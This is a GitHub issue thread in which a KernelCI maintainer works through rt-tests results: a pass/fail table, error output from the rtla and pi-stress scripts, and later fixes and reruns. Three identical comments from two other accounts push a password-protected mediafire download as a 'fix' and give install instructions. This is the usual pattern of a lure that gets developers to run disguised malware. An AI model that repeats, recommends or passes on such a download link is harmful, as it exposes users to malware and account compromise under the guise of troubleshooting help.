### ISSUE TITLE
Analyze the rt-tests results and fix issues

### ISSUE THREAD

**Issue by musamaanjum** [kernelci/kernelci-project#439]
| test    | result |
| -------- | ------- |
| cyclictest  | Pass    |
| cyclicdeadline  | Pass     |
| rtla-osnoise    | Error because of executor script  [1]  |
| rtla-timerlat    |     kernel config is missing [2] |
| pi-stress           |    error because of executor script in test-definition [3] |
| pmqtest             |  pass |
|ptsematest        |  pass|
|rt-migrate-test    | one test case failure (low priority)|
|signaltest            | pass|
|sigwaittest          | pass|
|svsematest         | pass |

Failures:
```
[1]
 + ./rtla-osnoise.sh -d 60s -w hackbench
Failed to set runtime and/or period
Could not apply config
mv: cannot stat 'osnoise_thread_noise_hist.txt': No such file or directory
mv: cannot stat 'osnoise_irq_noise_hist.txt': No such file or directory
mv: cannot stat 'osnoise_sample_threshold_hist.txt': No such file or directory

[2]
+ ./rtla-timerlat.sh -d 60s -w hackbench
Tracer timerlat not found!
Failed to enable the timerlat tracer
Failed to enable timerlat tracer

[3]
+ ./pi-stress.sh -D 60s -m True -r false -w hackbench
./pi-stress.sh: 37: True: not found
```

Related to: https://github.com/kernelci/kernelci-project/issues/417

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by musamaanjum** [comment]
Opened separate ticket for bug in test-definition scripts: https://github.com/Linaro/test-definitions/issues/530

**Comment by musamaanjum** [comment]
Adjust the timeout: https://github.com/kernelci/kernelci-core/pull/2696

**Comment by musamaanjum** [comment]
I'm checking the results after merging https://github.com/Linaro/test-definitions/issues/530. We use https://github.com/kernelci/test-definitions in our jobs. I don't know why we have forked the original repository. I'll ask around and get the fork updated and re-run to get the latest results.

**Comment by musamaanjum** [comment]
[rt-tests0.html.txt](https://github.com/user-attachments/files/17255739/rt-tests0.html.txt)

I ran all tests on the stable-rt v6.6-rt branch and all tests are passing. (Convert above file to html and view for results)

We use rtla package from debian respository to run 2 tests (osnoise and timerlat). This tools is present in the mainline (tools/tracing/rtla). We should install the latest tool from mainline instead of installing from debian package. Because of old package, these tests are partially run. I'll create a separate ticket for this.
